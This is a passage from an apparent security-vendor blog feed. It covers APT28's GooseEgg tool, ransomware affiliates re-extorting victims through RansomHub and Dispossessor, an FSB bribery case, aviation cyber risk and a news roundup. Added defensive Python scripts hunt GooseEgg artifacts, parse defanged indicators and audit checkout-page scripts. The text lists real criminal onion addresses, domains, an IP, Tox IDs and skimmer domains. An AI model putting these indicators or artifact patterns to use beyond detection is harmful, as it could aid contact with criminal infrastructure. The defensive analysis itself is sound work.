Typically, GooseEgg is deployed with a batch script named either execute.bat or doit.bat, which launches the executable and sets up persistence in the form of a scheduled task designed to run servtask.bat. The tool works by enabling the deployment of a malicious DLL (usually containing wayzgoose) capable of spawning other applications with SYSTEM-level permissions, which lets attackers perform remote code execution (RCE), install backdoors, and move laterally.

Source: Microsoft
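The deployment chain described above leaves a small set of named artifacts on an endpoint: the execute.bat/doit.bat launcher, a scheduled task whose action is servtask.bat, and a DLL with ‘wayzgoose’ in its name loaded with SYSTEM privileges. The following hunting script is an added example (it is not Microsoft’s or SentinelOne’s tooling) that checks endpoint telemetry records for those artifacts. The record layout, the field names and the sample records are assumptions constructed for the example; map them onto your own EDR or Sysmon export.

```python
"""Hunt for the GooseEgg deployment artifacts named in the report.

Added example, not vendor tooling. Scans a list of endpoint telemetry
records (scheduled-task registrations, process creations, image loads).
The record layout and the sample records below are constructed
assumptions; adapt the field names to your EDR or Sysmon export.
"""
import re
from dataclasses import dataclass

# Artifacts named in the write-up: launcher batch scripts, the script the
# persistence task runs, and the DLL naming pattern.
LAUNCHER_SCRIPTS = {"execute.bat", "doit.bat"}
PERSISTENCE_SCRIPT = "servtask.bat"
DLL_PATTERN = re.compile(r"wayzgoose.*\.dll$")


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of / and \\ separators and quotes."""
    return re.split(r"[\\/]", path.strip().strip('"'))[-1].lower()


def hunt(records: list[dict]) -> list[Finding]:
    """Return one Finding per record that matches a GooseEgg artifact rule."""
    findings: list[Finding] = []
    for r in records:
        host = r.get("host", "unknown")
        kind = r.get("type")
        if kind == "scheduled_task":
            # Persistence: a task whose action is servtask.bat
            action = r.get("action", "")
            if basename(action) == PERSISTENCE_SCRIPT:
                findings.append(Finding("gooseegg_persistence_task", host,
                                        f"task '{r.get('name')}' runs {action}"))
        elif kind == "process_create":
            # Launcher: cmd.exe /c "C:\path\execute.bat" style command lines
            cmd = r.get("command_line", "")
            if any(basename(tok) in LAUNCHER_SCRIPTS for tok in re.split(r"\s+", cmd)):
                findings.append(Finding("gooseegg_launcher_script", host, cmd))
        elif kind == "image_load":
            # Payload: a DLL named wayzgoose*.dll, worse when loaded as SYSTEM
            image = r.get("image", "")
            if DLL_PATTERN.search(basename(image)):
                ctx = "as SYSTEM" if "SYSTEM" in r.get("user", "").upper() else "unprivileged"
                findings.append(Finding("gooseegg_dll_load", host,
                                        f"{r.get('process')} loaded {image} {ctx}"))
    return findings


def by_rule(findings: list[Finding]) -> dict[str, int]:
    """Count findings per rule, handy for a quick triage summary."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample telemetry (not real IoCs): one benign task, one benign
# process, one benign DLL load, and one of each GooseEgg artifact on ws01.
SAMPLE_RECORDS = [
    {"type": "scheduled_task", "host": "ws01", "name": "NightlyBackup",
     "action": r"C:\Tools\backup.bat"},
    {"type": "scheduled_task", "host": "ws01", "name": "Updater",
     "action": r"C:\Users\Public\servtask.bat"},
    {"type": "process_create", "host": "ws01", "user": "CORP\\jdoe",
     "command_line": r'cmd.exe /c "C:\Users\Public\execute.bat"'},
    {"type": "process_create", "host": "ws02", "user": "CORP\\jdoe",
     "command_line": r"notepad.exe C:\notes\todo.txt"},
    {"type": "image_load", "host": "ws02", "user": "CORP\\jdoe",
     "process": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\kernel32.dll"},
    {"type": "image_load", "host": "ws01", "user": "NT AUTHORITY\\SYSTEM",
     "process": r"C:\Windows\System32\spoolsv.exe",   # constructed; Print Spooler host process
     "image": r"C:\Users\Public\wayzgoose99.dll"},    # constructed name matching the pattern
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_RECORDS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Three independent rules rather than one combined signature means a single missing artifact (for example a renamed launcher) still leaves the persistence task or the DLL load to fire on; correlate findings by host to rebuild the chain.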

APT28 is known to use publicly available exploits alongside this Windows Print Spooler flaw, including CVE-2023-23397 and the PrintNightmare vulnerabilities tracked as CVE-2021-34527 and CVE-2021-1675. Researchers note that APT28 deploys GooseEgg to enable checking exploit success, customer version identification, and privilege escalation – all in support of their main objective to steal credentials and maintain access on the compromised target.

Advanced and well-resourced threat groups like APT28 continually refine their approach, testing new and custom malware and techniques to avoid attribution. CISA has since added CVE-2022-38028 to its KEV catalog and urged federal agencies to identify any systems vulnerable to the flaw and apply the available patch.

Ransomware Evolution | How Cheated Affiliates Are Recycling Victim Data for Profit

Threat actors consistently alter and develop their schemes in order to further escalate their payoffs. In a new trend, ransomware affiliates are actively re-monetizing stolen data outside of their original RaaS agreements, especially as financial squabbles between threat actors emerge in the ransomware economy. The affiliates in such instances are starting to work with third parties or external data leak services in order to re-extort victims who have already paid the ransom to the original attackers.

This blog post examines how affiliate attackers are embracing this new third-party extortion method, illustrated most recently by the ostensibly back-to-back cyberattacks on Change Healthcare and the emergence of services like RansomHub and Dispossessor.

ALPHV Exit Scam & Re-Extortion by RansomHub

In February 2024, a subsidiary of healthcare giant UnitedHealth Group (UHG) was forced to take down its IT systems and various services. The root of the disruption was a cyberattack by a BlackCat (aka ALPHV) affiliate on Change Healthcare, a healthcare technology platform used by the subsidiary.

Post-attack, ALPHV ransomware operators reportedly took down their data leak blog, servers, and operation negotiation sites, and failed to pay the affiliate their agreed share of the ransom.

Purportedly, Change Healthcare paid out the $22 million ransom demand, only to be targeted a second time just weeks after recovering from the initial attack. This time around, the ransomware attack was claimed by a threat actor working in conjunction with RansomHub, a new extortion group claiming to hold 4 terabytes of the victim’s sensitive data including personally identifiable information (PII) of active U.S. military personnel, patient records, and payment information.

It is believed that after ALPHV reneged on their payment, the affiliate partnered with RansomHub and re-used the data stolen from the initial attack in order to secure a payoff. At the time of writing, Change Healthcare had been removed from RansomHub’s DLS on April 20, 2024, presumably due to payment and cooperation with the threat actors.

RansomHub and Change Healthcare Posting

RansomHub RaaS

RansomHub emerged in early February 2024 with a simple data leak site (DLS). Their focus mirrors other historically well-known operations such as REvil, ALPHV, and Play with regards to their core values and overall mission statements.

Standard RansomHub ransom note

RansomHub operates as a ransomware-as-a-service (RaaS), partnering with affiliates that work with a variety of ransomware families, including ALPHV and LockBit. Notably, RansomHub works with other threat actors and groups to republish and rebroadcast the availability of victim data. There are multiple, revolving Telegram groups dedicated to amplifying the reach of RansomHub’s leaks. An example of this is the “R3dd1sh_34_E4gl3_D4t4l34ks” channel (aka Reddish Eagle Dataleaks).

RansomHub archive amplified by R3dd1sh_34_E4gl3_D4t4l34ks

This development means that the data leak sites (DLSs) usually associated with a particular threat actor are no longer the only avenue of exposure for ransomware victims. Downstream amplification of these leaks is now common and generally open to all non-private Telegram or Discord groups.

Interestingly, according to RansomHub’s own “rules”, it does not allow:

  • Affiliates to attack entities in the Commonwealth of Independent States (CIS), Cuba, China, Romania, or North Korea,
  • Re-attacks for targeted companies that have already made payment, nor
  • Attacks against non-profit organizations.

Original RansomHub About Page

However, given the current situation faced by Change Healthcare, the second bullet in the list above appears to be a gray area, especially if re-extorting ransomware victims constitutes an attack.

Our research indicates that multiple affiliates are now partnering with RansomHub in an effort to regain profitability following the apparent collapse of ALPHV.

Dispossessor Data Leak Blog

Dispossessor emerged in February of 2024, advertising the availability of previously-leaked data for download and potential sale. These announcements were placed across multiple forums and markets, including BreachForums and XSS.

Dispossessor announcement on Breachforums (LockBit data)

The X account @ransomfeednews recently posted regarding this new group, presenting their findings that indicated how Dispossessor “is not ransomware, but a group of scoundrels trying to monetize (on nothing) using the claims of other groups.” The group is also active in Telegram, posting similar announcements across well-trafficked Telegram channels.

Dispossessor initially announced the renewed availability of the data from some 330 LockBit victims. This was claimed to be reposted data from previously available LockBit victims, now hosted on Dispossessor’s network and thus not subject to LockBit’s availability restrictions.

Dispossessor Blog

Dispossessor appears to be reposting data previously associated with other operations with examples ranging from Cl0p, Hunters International, and 8base. We are aware of at least a dozen victims listed on Dispossessor that have also been previously listed by other groups.

In addition, there are apparent links to other aggregate-style operators like Snatch.

Dispossessor Blog with Snatch links highlighted

In many cases, the Dispossessor page links to the Dispossessor-Cloud repository. One victim was originally on CL0P’s data leak site in early 2023. Dispossessor’s data is identical to that hosted in the original CL0P magnet links for this and other victims.

Rabbit Hole Data Leak Site (DLS)

A third emerging service with potential to contribute to the expansion of monetization of previously leaked victim data is Rabbit Hole DLS, first observed on March 13, 2024. In an English translation of the site’s About Page, Rabbit Hole is described as a leaks “blog for small and medium-sized teams that do not have their own website”. The site is currently promoted in forums and dark markets.

Translated Rabbit Hole Blog announcement

Original Postings (translated from RU):
blog for small and medium-sized teams that do not have their own website

rabbit hole is not a ransom group, it is a general blog for small to medium sized teams. this blog was created in order to put pressure on corporations, due to the large number of publications from different teams – the rabbit hole offers you a haven where you can publish any leak [government institutions and hospitals are an exception]

Once a threat actor creates a Rabbit Hole account, victim leaks can be added, updated, and managed through its web portal. Each account manages its leaks through what is referred to as a ‘cabinet’ within the Rabbit Hole blog interface.

Rabbit Hole Blog Account “Cabinet”

When posting leak data, the user is able to supply information including who they are and who the victim is such as the name of the company, URL, company description, publish date/deadline, any associated images, and additional text to be included with the public leak description upon publication. The download URL for associated leaked data is also supplied via this interface.

New Leak creation on Rabbit Hole Blog

Once all details have been provided, they are submitted to higher level owners and managers of the Rabbit Hole blog. Moderators are then responsible for the ultimate public posting of the leak. The Rabbit Hole platform, ideal for emerging cybercriminals with little to no infrastructure or resources, could easily accommodate multiple small-time actors looking to monetize the same data leaks. We continue to monitor how this site develops.

Conclusion

As larger, established threat groups fold or re-brand, we can expect to see many affiliates cut out of pending payments. Since threat actors will hold onto exfiltrated data, the likelihood of that data being used to re-extort the victims is high and will continue to grow. While it may seem like common sense not to trust threat actors to hold up their end of a deal, the infosec community may continue to witness the fallout of in-fighting and disagreements between cybercriminals, and between RaaS providers and their affiliates.

The trust model upon which these RaaS agreements are created does not scale well, as most recently highlighted by security researchers monitoring the relationships between threat actors and affiliates in the ecosystem:

“Additionally, we saw a continuation of long-tailed data exfiltration defaults by threat actors in Q1, i.e., posting of information on a leak site after payment or “hostage trading” with other groups or individuals, which adds further evidence to the file on the lack of benefits to pay for suppressing a data leak or any confidence in a criminal actor keeping their word.”

As the ransomware and extortion landscape evolves, criminals will do what they need to do to protect their investments and paydays. Since affiliates carrying out a ransomware attack hold the actual data, they have the option to go elsewhere to monetize the data to collect payment. Organizations continue to be discouraged by global law enforcement agencies from paying ransoms when dealing with a cyberattack and to file a report with the IC3, contributing to greater cyber resilience to potential attacks.

Indicators

z5jixbfejdu5wtxd2baliu6hwzgcitlspnttr7c2eopl5ccfcjrhkqid[.]onion
ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd[.]onion
h6tejafqdkdltppzj7q34enltmfnpxaf7cseslv6djgiukiii573xtid[.]onion

dispossessor[.]com/
dispossessor-cloud[.]com/
205[.]209.102[.]218

tox[:]CE742906B254399832E4ED6EC1DDA50D7942F9A4F3F0FE46C19E1737FF29EF67DDAF3AB87B44
tox[:]36712626ED19B307ECB3E971AFDFAA449607100383DBE4C064CCD5909355D908AECCF6180CDA

actor:DISPOSSESSOR
actor:plzdbmagain1037
actor:ViDoK
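The list above mixes several indicator types in the usual defanged notation (“[.]”, “[:]”, a trailing slash on bare hosts). The parser below is an added example, not SentinelOne tooling, that turns such a list into typed records: it refangs values only so that they can be matched against DNS or proxy logs inside a detection pipeline, and keeps the original defanged text for sharing. The sample input is a subset of the Indicators list above; the “[dot]” form is also handled because it appears in the KrebsOnSecurity section later on this page. Tox IDs are validated as 76 hex characters and v3 onion addresses as 56 base32 characters; both checks are ours, not the page’s.

```python
"""Parse a defanged indicator list into typed, matchable records.

Added example; not SentinelOne tooling. Refanging is done only for matching
inside detection tooling; `raw` keeps the defanged form for sharing.
"""
import re
from dataclasses import dataclass

_IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")
_ONION = re.compile(r"^[a-z2-7]{56}\.onion$")       # v3 hidden-service address
_TOX = re.compile(r"^[0-9A-Fa-f]{76}$")             # Tox ID: 76 hex characters
_DOMAIN = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.IGNORECASE)


@dataclass(frozen=True)
class Indicator:
    kind: str   # onion | domain | ipv4 | tox_id | actor_handle | unknown
    value: str  # refanged form, for matching
    raw: str    # original line, still defanged


def refang(text: str) -> str:
    """Undo the common defanging substitutions."""
    return text.replace("[.]", ".").replace("[dot]", ".").replace("[:]", ":")


def classify(line: str) -> Indicator:
    """Classify one indicator line; unknown shapes are kept, not dropped."""
    raw = line.strip()
    s = refang(raw)
    if s.startswith("actor:"):
        return Indicator("actor_handle", s[len("actor:"):], raw)
    if s.startswith("tox:"):
        tox = s[len("tox:"):]
        return Indicator("tox_id" if _TOX.match(tox) else "unknown", tox, raw)
    s = s.rstrip("/")  # 'dispossessor[.]com/' is a bare host with a trailing slash
    if _IPV4.match(s):
        return Indicator("ipv4", s, raw)
    if _ONION.match(s):
        return Indicator("onion", s, raw)
    if _DOMAIN.match(s):
        return Indicator("domain", s, raw)
    return Indicator("unknown", s, raw)


def load_indicators(text: str) -> list[Indicator]:
    """Parse a whole list, skipping blank lines."""
    return [classify(line) for line in text.splitlines() if line.strip()]


def matching(indicators: list[Indicator], observed_host: str) -> list[Indicator]:
    """Network indicators whose refanged value equals an observed hostname or IP."""
    h = observed_host.strip().lower()
    return [i for i in indicators
            if i.kind in {"domain", "ipv4", "onion"} and i.value.lower() == h]


# Subset of the Indicators list above, as published (defanged).
SAMPLE_INDICATORS = """\
z5jixbfejdu5wtxd2baliu6hwzgcitlspnttr7c2eopl5ccfcjrhkqid[.]onion
dispossessor[.]com/
dispossessor-cloud[.]com/
205[.]209.102[.]218
tox[:]CE742906B254399832E4ED6EC1DDA50D7942F9A4F3F0FE46C19E1737FF29EF67DDAF3AB87B44
actor:DISPOSSESSOR
"""

if __name__ == "__main__":
    for ind in load_indicators(SAMPLE_INDICATORS):
        print(f"{ind.kind:13} {ind.value}")
```

Keep the `raw` field when writing results back out: refanged strings pasted into tickets or chat become clickable links, which is exactly what defanging exists to prevent.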

Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme

The head of counterintelligence for a division of the Russian Federal Security Service (FSB) was sentenced last week to nine years in a penal colony for accepting a USD $1.7 million bribe to ignore the activities of a prolific Russian cybercrime group that hacked thousands of e-commerce websites. The protection scheme was exposed in 2022 when Russian authorities arrested six members of the group, which sold millions of stolen payment cards at flashy online shops like Trump’s Dumps.

A now-defunct carding shop that sold stolen credit cards and invoked 45’s likeness and name.

As reported by The Record, a Russian court last week sentenced former FSB officer Grigory Tsaregorodtsev for taking a $1.7 million bribe from a cybercriminal group that was seeking a “roof,” a well-placed, corrupt law enforcement official who could be counted on to both disregard their illegal hacking activities and run interference with authorities in the event of their arrest.

Tsaregorodtsev was head of the counterintelligence department for a division of the FSB based in Perm, Russia. In February 2022, Russian authorities arrested six men in the Perm region accused of selling stolen payment card data. They also seized multiple carding shops run by the gang, including Ferum Shop, Sky-Fraud, and Trump’s Dumps, a popular fraud store that invoked the 45th president’s likeness and promised to “make credit card fraud great again.”

All of the domains seized in that raid were registered by an IT consulting company in Perm called Get-net LLC, which was owned in part by Artem Zaitsev — one of the six men arrested. Zaitsev reportedly was a well-known programmer whose company supplied services and leasing to the local FSB field office.

The message for Trump’s Dumps users left behind by Russian authorities that seized the domain in 2022.

Russian news sites report that Internal Affairs officials with the FSB grew suspicious when Tsaregorodtsev became a little too interested in the case following the hacking group’s arrests. The former FSB agent had reportedly assured the hackers he could have their case transferred and that they would soon be free.

But when that promised freedom didn’t materialize, four of the defendants pulled the walls down on the scheme and brought down their own roof. The FSB arrested Tsaregorodtsev, and seized $154,000 in cash, 100 gold bars, real estate and expensive cars.

At Tsaregorodtsev’s trial, his lawyers argued that their client wasn’t guilty of bribery per se, but that he did admit to fraud because he was ultimately unable to fully perform the services for which he’d been hired.

The Russian news outlet Kommersant reports that all four of those who cooperated were released with probation or correctional labor. Zaitsev received a sentence of 3.5 years in prison, and defendant Alexander Kovalev got four years.

In 2017, KrebsOnSecurity profiled Trump’s Dumps, and found the contact address listed on the site was tied to an email address used to register more than a dozen domains that were made to look like legitimate Javascript calls many e-commerce sites routinely make to process transactions — such as “js-link[dot]su,” “js-stat[dot]su,” and “js-mod[dot]su.”

Searching on those malicious domains revealed a 2016 report from RiskIQ, which shows the domains featured prominently in a series of hacking campaigns against e-commerce websites. According to RiskIQ, the attacks targeted online stores running outdated and unpatched versions of shopping cart software from Magento, Powerfront and OpenCart.

Those shopping cart flaws allowed the crooks to install “web skimmers,” malicious Javascript used to steal credit card details and other information from payment forms on the checkout pages of vulnerable e-commerce sites. The stolen customer payment card details were then sold on sites like Trump’s Dumps and Sky-Fraud.
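The skimmer domains described above worked because a checkout page that loads one more external script from a plausible-looking host rarely gets noticed. One routine control is to audit every external `<script src>` host on the checkout page against an allowlist. The script below is an added example (not RiskIQ’s or KrebsOnSecurity’s tooling) that does that with the standard library; the sample page, the site host and the allowlist are constructed, and the one real name in it, js-stat.su, is taken from the paragraph above.

```python
"""Audit the external scripts on a checkout page against an allowlist.

Added example, not vendor tooling. Lists every external <script src> host
and flags those that are neither first-party nor allowlisted. The sample
HTML, site host and allowlist are constructed for the example.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> tag, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.sources: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def script_hosts(html: str) -> list[str]:
    """Hostnames of all external scripts; relative paths (first-party) have no host."""
    parser = _ScriptCollector()
    parser.feed(html)
    hosts = []
    for src in parser.sources:
        host = urlparse(src).hostname   # handles https://, //cdn..., and /relative
        if host:
            hosts.append(host.lower())
    return hosts


def unexpected_hosts(html: str, site_host: str, allowlist: set[str]) -> list[str]:
    """External script hosts that are neither the site itself nor allowlisted."""
    allowed = {h.lower() for h in allowlist} | {site_host.lower()}
    flagged: list[str] = []
    for host in script_hosts(html):
        if host not in allowed and host not in flagged:
            flagged.append(host)
    return flagged


# Constructed checkout page: a first-party script, an allowlisted payment SDK,
# a protocol-relative first-party script, and one look-alike host.
SAMPLE_HTML = """
<html><head>
  <script src="/static/checkout.js"></script>
  <script src="https://cdn.example-payments.test/sdk.js"></script>
  <script src="//shop.example.test/js/cart.js"></script>
  <script src="https://js-stat.su/stat.js"></script>
</head><body><form id="payment"></form></body></html>
"""
SITE_HOST = "shop.example.test"
ALLOWLIST = {"cdn.example-payments.test"}

if __name__ == "__main__":
    for host in unexpected_hosts(SAMPLE_HTML, SITE_HOST, ALLOWLIST):
        print("unexpected script host:", host)
```

Host allowlisting catches the pattern in the RiskIQ report, but not a skimmer appended to a first-party file, so pair it with a content hash or Subresource Integrity check on the scripts themselves and a Content-Security-Policy `script-src` directive that enforces the same allowlist in the browser.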

PinnacleOne ExecBrief | Aviation Cybersecurity

Last week, PinnacleOne reviewed escalation dynamics in the Middle East.

This week, we turn our attention to domestic critical infrastructure with a look at recent developments in aviation cybersecurity.

Insight Focus | Aviation Cybersecurity

The aviation sector continues to face a complex and evolving cybersecurity threat landscape with nation-state actors, cybercriminal groups, and hacktivists targeting critical infrastructure. Last week, the FAA issued a ground stop order on Alaska Airlines for one hour due to an “upgrade issue with flight software that calculates weight and balance.” This follows a similar hour-long nationwide ground stop last year caused by a software update at United Airlines, a network-wide outage at WestJet caused by a service provider, and a ransomware breach at Sabre.

Most concerningly, on Friday, the Department of Homeland Security (DHS) published an official notice stating that the Transportation Security Oversight Board (TSOB) has recommended to the Transportation Security Administration (TSA) that a cybersecurity emergency exists, warranting the expedited implementation of critical cyber mitigation measures through emergency regulatory authority.

The TSOB – including the Secretaries of Homeland Security, Transportation, Defense, and the Treasury, the Attorney General, the Director of National Intelligence, and a National Security Council representative — convened a meeting to review TSA’s transportation security plans for cybersecurity in the aviation sector and provide a recommendation regarding TSA’s emergency determination to issue Joint Emergency Amendment (EA) 23-01.

During the classified briefing, the TSOB was presented with sensitive security information and intelligence regarding the severe cyber threat to the aviation transportation system. The board discussed the circumstances leading to TSA’s issuance of Joint EA 23-01, which requires performance-based cybersecurity measures to prevent the disruption and degradation of critical systems. The TSOB’s recommendation endorsed the need for TSA to proceed with these critical mitigation measures on an emergency basis.

This development came in the context of a September 2023 advisory from the Cybersecurity and Infrastructure Security Agency (CISA), which identified indicators of compromise at an Aeronautical Sector organization as early as January 2023. Nation-state advanced persistent threat (APT) actors exploited vulnerabilities in a public-facing application (Zoho ManageEngine ServiceDesk Plus) and a firewall device to gain unauthorized access, establish persistence, and move laterally through the network. CISA warned that “additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.” APT interest in critical infrastructure means that such exploitation happens on other devices and software, too, not just the Zoho product in this particular alert.

Aviation Cybersecurity Risks

Leaks of intelligence documents in 2023 from Russia indicated a specific interest in targeting operational aviation systems. Further, Chinese threat actors are known to be targeting US critical infrastructure firms (including the aviation sector) given their military doctrine that sees disrupting civilian systems as a means of deterring or coercing US political decision-makers in a time of conflict.

Participants in the USAF Civil Reserve Air Fleet should also expect to be targeted for their role supporting contingency airlift requirements for the Department of Defense, something likely to be activated in a Taiwan crisis situation.

Against this geopolitical backdrop, aviation CISOs face a complex technology and cybersecurity risk environment, resulting from:

  • Growing integration of new tech into legacy systems, including new connectivity interfaces and e-Enabled aircraft;
  • Increasing federal cyber regulations and compliance requirements;
  • Constrained security budgets that limit focus to catastrophic risks and compliance;
  • Security cultures that often silo cyber/IT from the broader organization and create obstacles to effective enterprise engagement and operational collaboration;
  • Tactically oriented people, processes, and tooling aimed at immediate triage, not strategic risk;
  • Complex global supply chains that increase upstream risk exposure; and
  • Increasing third-party risks from the economy-wide move to, and dependency on, cloud-enabled services and the associated shift in risk management responsibilities.

While the geopolitical threats to aviation cybersecurity grow, aviation faces the technical difficulty of defending complex legacy and modern systems. The industry must protect a uniquely broad range of vulnerable elements from its airport and online systems and data to vendor supply chains and airplane electronics. Despite all this, aviation cybersecurity’s resources and incentives lag the threat environment.

Corporate executives must recognize that the aviation industry remains at the frontlines of emerging geopolitical risk, and cybersecurity threats have the potential to cause significant operational, financial, and reputational damage. The TSOB’s recommendation and the CISA advisory underscore the urgency of the situation and the need for high-level, enterprise-wide engagement to address these risks effectively.

Investing in a comprehensive cybersecurity strategy, aligning technical and security stacks, and fostering collaboration between corporate and cybersecurity leadership is essential to mitigate the risk of a catastrophic event. As the DHS notice and CISA advisory demonstrate, the stakes are high, and failure to act decisively could result in severe consequences for the aviation industry and national security.

The aviation sector must consider modern, more expansive risk models to navigate a strategic environment at the nexus of emerging cyber and geopolitical threats. Even when the risks are clear and the gaps manifest, tight budgets and other business priorities can get in the way of building an effective security organization. This requires high-level, executive engagement across the enterprise to help leadership understand how these risks impact operational reliability, customer relations, corporate liability, shareholder value, passenger safety, and national security.

The combination of legacy IT/OT with new connectivity interfaces, sprawling third-party dependencies and digital supply chains, strained corporate balance sheets and infosec budgets, increasing regulatory mandates, highly visible industry stumbles, and aggressive nation-state threats indicate major turbulence ahead.

The Good, the Bad and the Ugly in Cybersecurity – Week 16

The Good | DoJ Indicts Cryptojacking Criminal and Botnet Operator Supporting Ransomware Actors

The DoJ doled out two indictments this week: the first announcing the arrest of Charles O. Parks III for his role in an elaborate cryptojacking scheme, the second, charging Alexander Lefterov, owner and operator of a major botnet.

Parks was charged with wire fraud, money laundering, and illegal transactions, tallying up to a maximum of 30 years in prison. According to the DoJ, the basis of Parks’ scheme was renting $3.5 million worth of cloud servers through a number of fake LLCs in order to mine nearly $1 million in cryptocurrency.

After tricking the cloud service providers (CSPs) into escalating his privileges, Parks was given access to services equipped with powerful graphics cards that were then used to mine Monero, Litecoin, and Ether. The mined funds were laundered through purchasing NFTs and converting them through traditional banks and various crypto exchanges to fund a lavish lifestyle.

Lefterov was indicted by a federal grand jury for aggravated identity theft, computer fraud, and conspiracy to commit wire fraud. Through the large-scale botnet he maintained, the Moldovan national and his associates have been linked to thousands of compromised computers across the U.S.

Source: FBI

Using credentials harvested from the infected computers, Lefterov and his co-conspirators targeted victims’ financial accounts across banking, payment processing, and retail platforms to steal money. In tandem, Lefterov allegedly leased his botnet to other cybercriminals for ransomware distribution, later receiving a share of the profits from successful attacks.

Following both of these indictments, U.S. law enforcement reiterates their commitment to cyber defense, stating that the FBI and its partners will continue to investigate and pursue those involved in malicious activities both domestically and internationally.

The Bad | Researchers Link Russian-Based Sandworm APT to Attacks on Water Supply Systems

The GRU-linked APT known as Sandworm has recently taken a behind-the-scenes approach, conducting covert attacks through various online personas and posing as hacktivist groups to mask their activities. In a new report, cybersecurity researchers identified Sandworm’s presence in at least three Telegram channels created to conduct disruptive operations and amplify pro-Russian narratives.

Sandworm has operated since 2009 under Unit 74455 of the Main Intelligence Directorate of the Russian Federation (GRU). Known to employ adaptive and diverse methods for initial access and exploit supply chain vulnerabilities, Sandworm is thought by researchers to be one of Russia’s foremost “cyber sabotage units” as well as a “formidable” threat globally.

Most recently, Sandworm has begun using online personas to execute disruptive operations and enhance the image of the GRU’s cyber capabilities. The report tracks the APT group’s activity across three Telegram channels: XakNet Team, CyberArmyofRussia_Reborn, and Solntsepek. While most of the activity centers around targeting Ukrainian entities, one of the channels this week claimed attacks on critical water supply centers in the U.S. and Poland, and a hydroelectric facility in France. The posted videos showed fake images of attackers manipulating the controls of water suppliers in Texas.

While Sandworm’s focus has shifted towards espionage and influence operations, it continues to conduct disruptive attacks, targeting electoral systems, conducting intelligence gathering, stealing credentials, and retaliating against perceived adversaries. Cyber defenders continue to warn of potential interference in upcoming national elections and political events across the world, with Ukraine remaining a primary target amid ongoing conflict.

The Ugly | Suspected Nation-State Actors Exploit Zero-Day Flaw in Palo Alto Network Firewalls

Over the weekend, state-sponsored threat actors were suspected of exploiting a zero-day vulnerability in Palo Alto Networks’ PAN-OS firewall software. Though the vulnerability was quickly disclosed and patched by the Californian cybersecurity company, exploit code has since emerged this week and is already being used in attacks. Despite earlier mitigations provided during initial discovery, Palo Alto Networks is now urging users to upgrade their software immediately as the most reliable solution.

Tracked as CVE-2024-3400, the maximum severity flaw enables unauthenticated remote code execution (RCE) via command injection in low-complexity attacks that do not require user interaction. It affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with a GlobalProtect gateway or portal (or both). Palo Alto Networks’ advisory confirms that Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Researchers that initially detected the flaw found that the threat actor was focused on exporting configuration data from compromised devices before leveraging them to move laterally into victim organizations. Noting the level of tradecraft and speed of the attacks, the report suggests that the threat actor is highly capable with a clear playbook – indications of a state-backed attack. Along with warnings to secure vulnerable devices, CISA has added the vulnerability to its Known Exploited Vulnerabilities catalog.

Malware workflow (Source: Volexity)

Internet-connected network devices are often running on outdated, unpatched firmware which makes them vulnerable to exploitation. This, along with the key role they play in network infrastructure, means such devices are considered low-hanging fruit to attackers looking for a way in. To mitigate risks, companies should prioritize regular patches, enforce robust access controls, and practice network segmentation to safeguard their networks against intrusion.

Insuring Cyber Health | Chubb’s Insight via SentinelOne Telemetry

In an expanding collaboration between Chubb, one of the largest publicly traded property and casualty insurance companies, and SentinelOne, a cybersecurity leader, clients of SentinelOne who are also Chubb policyholders can now share their enterprise cyber health assessment data with Chubb. This facilitates a more efficient and precise underwriting process.

With the increasing emphasis on cybersecurity investment, insurance carriers are seeking greater transparency into their insureds’ cybersecurity health. The collaboration not only offers policyholders streamlined access to SentinelOne’s cybersecurity solutions, but also enhances transparency into policyholders’ cyber health investments through SentinelOne’s Vital Signs Report.

This post captures a Q&A between Craig Guiliano, SVP of Threat Intelligence and Policyholder Services at Chubb, and Bridget Mead, Senior Manager of IR Cyber Risk at SentinelOne, as they address some frequently asked questions about the Vital Signs Report.

Q: What is the Vital Signs Report?

Chubb/Guiliano: The Vital Signs Report (VSR) is an assessment of our policyholders’ cybersecurity posture. This report is going to be a game changer for not only how we, as the carrier, assess our individual policyholder’s cybersecurity health, but for our ability to assess our portfolio exposure as one of the world’s largest insurance companies. Our underwriters are quickly moving away from checkboxes on a questionnaire and moving towards data-driven policy renewal decisions.

SentinelOne/Mead: The VSR is based on a collection of internal signals that we mapped to the Center for Internet Security’s (CIS) Critical Security Controls framework (CIS18). We make the report available to all SentinelOne clients at no charge. It displays the strength of a client’s digital environment in areas important to cyber security and the cyber insurance underwriting process. The graphic below shows the major categories included.

Q: How do clients access this report?

SentinelOne/Mead: We’ve made it easy for Chubb policyholders to share this report with Chubb. It’s just a few clicks away. Clients can access the VSR report by going to the Singularity Marketplace page and selecting the Cyber Insurance menu item. From the Cyber Insurance menu, they can select Chubb and consent to the sharing via an End-User License Agreement (EULA). Chubb will be notified on their end that the report has been shared.

Chubb/Guiliano: Once we receive the VSR on our end, our policyholders will be able to view the report with their insurance brokers and Chubb underwriters. We’re expecting more transparent and robust conversations around loss control strategies with our policyholders that share this data with us. In addition, participating policyholders may enjoy incentivized policy pricing, subject to applicable insurance laws and regulations, and more efficient underwriting.

Q: What happens after the SentinelOne client clicks through the EULA?

SentinelOne/Mead: From a technical perspective, once the SentinelOne client does the EULA click through, the VSR examines the client’s SentinelOne console, collects the appropriate data signals, and populates the report.

